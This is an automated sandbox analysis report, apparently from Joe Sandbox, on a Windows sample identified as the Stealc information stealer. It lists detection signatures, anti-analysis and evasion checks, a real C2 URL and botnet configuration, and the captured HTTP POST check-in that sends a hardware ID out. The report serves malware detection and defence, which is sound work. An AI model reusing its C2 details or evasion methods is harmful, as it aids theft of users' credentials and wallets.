Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525474
MD5:0ab8fd273f356fc72fc0d8971976f60e
SHA1:f88991b3868aad8231d28caa354f0f8a29deeb3b
SHA256:6b87bd43d236ccd979ff563fea34490f006871209d6db9123c494a1a9138fd2d
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3536 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0AB8FD273F356FC72FC0D8971976F60E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3536JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3536JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.b00000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-04T09:45:05.821293+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.b00000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpVVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpnVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/HVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00B0C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00B09AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00B07240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00B09B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B18EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00B18EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B14910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B0DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B0E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B0ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B14570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B0F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B13EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0F68A FindFirstFileA,0_2_00B0F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B0DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B0BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 41 43 43 46 45 31 33 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 2d 2d 0d 0a Data Ascii: ------AEHIECAFCGDBFHIDBKFCContent-Disposition: form-data; name="hwid"42BACCFE13991312647697------AEHIECAFCGDBFHIDBKFCContent-Disposition: form-data; name="build"doma------AEHIECAFCGDBFHIDBKFC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B04880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00B04880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 41 43 43 46 45 31 33 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 2d 2d 0d 0a Data Ascii: ------AEHIECAFCGDBFHIDBKFCContent-Disposition: form-data; name="hwid"42BACCFE13991312647697------AEHIECAFCGDBFHIDBKFCContent-Disposition: form-data; name="build"doma------AEHIECAFCGDBFHIDBKFC--
                Source: file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/H
                Source: file.exe, 00000000.00000002.2102191694.0000000001255000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
                Source: file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D8F00_2_00D7D8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D90_2_00ED50D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6209A0_2_00F6209A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6B0700_2_00F6B070
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7F9BE0_2_00E7F9BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D989020_2_00D98902
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D85A3F0_2_00D85A3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E393D00_2_00E393D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD3A70_2_00EDD3A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED23920_2_00ED2392
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E653030_2_00E65303
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE24C90_2_00EE24C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDBCB70_2_00EDBCB7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4C5E00_2_00E4C5E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6D6A50_2_00E6D6A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDEE6A0_2_00EDEE6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9E650_2_00ED9E65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D87FC00_2_00D87FC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB7F8D0_2_00DB7F8D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7FF2C0_2_00D7FF2C
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B045C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: incycuuu ZLIB complexity 0.9948040822407628
                Source: file.exe, 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B18680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00B18680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B13720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00B13720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\6UEFEYYD.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1874432 > 1048576
                Source: file.exeStatic PE information: Raw size of incycuuu is bigger than: 0x100000 < 0x1a3800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b00000.0.unpack :EW;.rsrc :W;.idata :W; :EW;incycuuu:EW;crmoanhn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;incycuuu:EW;crmoanhn:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B19860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d86c3 should be: 0x1c9eb3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: incycuuu
                Source: file.exeStatic PE information: section name: crmoanhn
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F990F3 push 59A68E01h; mov dword ptr [esp], edi0_2_00F991A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE78ED push ecx; mov dword ptr [esp], ebp0_2_00FE7857
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D8F0 push 74A684E4h; mov dword ptr [esp], edx0_2_00D7D9F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D8F0 push 54BD4ECFh; mov dword ptr [esp], ebp0_2_00D7D9F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D8F0 push ebx; mov dword ptr [esp], ecx0_2_00D7DA7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D8F0 push edx; mov dword ptr [esp], 532E0CC3h0_2_00D7DB30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE88D9 push 16A54A02h; mov dword ptr [esp], ebx0_2_00FE8953
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push esi; mov dword ptr [esp], 3E79D0C7h0_2_00ED5108
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push eax; mov dword ptr [esp], edx0_2_00ED513B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ecx; mov dword ptr [esp], esi0_2_00ED514A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ecx; mov dword ptr [esp], 7DCAE4A4h0_2_00ED514E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push edi; mov dword ptr [esp], ebx0_2_00ED516E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push 37ABE7EFh; mov dword ptr [esp], eax0_2_00ED51FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push 663CA09Ch; mov dword ptr [esp], ecx0_2_00ED5242
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push 2053C220h; mov dword ptr [esp], eax0_2_00ED5290
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push esi; mov dword ptr [esp], ecx0_2_00ED52A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ebx; mov dword ptr [esp], eax0_2_00ED52BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push eax; mov dword ptr [esp], edx0_2_00ED52BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push eax; mov dword ptr [esp], esi0_2_00ED52D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 73EEE629h0_2_00ED53E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ecx; mov dword ptr [esp], 2E306851h0_2_00ED547F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 52AA1206h0_2_00ED54FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push edx; mov dword ptr [esp], ebp0_2_00ED55AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 1F7D4B58h0_2_00ED55AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push esi; mov dword ptr [esp], 4A48A473h0_2_00ED55F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push 24841E3Ch; mov dword ptr [esp], ecx0_2_00ED562D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 74BB4129h0_2_00ED5636
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push eax; mov dword ptr [esp], ebx0_2_00ED5684
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push eax; mov dword ptr [esp], ebp0_2_00ED56CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push 7626C042h; mov dword ptr [esp], edx0_2_00ED56D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED50D9 push esi; mov dword ptr [esp], eax0_2_00ED56E7
                Source: file.exeStatic PE information: section name: incycuuu entropy: 7.953045233922871

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B19860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13701
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE672D second address: EE6749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jp 00007F2AD9523876h 0x0000000d jmp 00007F2AD952387Eh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6898 second address: EE68A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AD900F596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE68A2 second address: EE68A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6B76 second address: EE6B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6D1E second address: EE6D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6D24 second address: EE6D47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2AD900F598h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F2AD900F5A1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6D47 second address: EE6D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
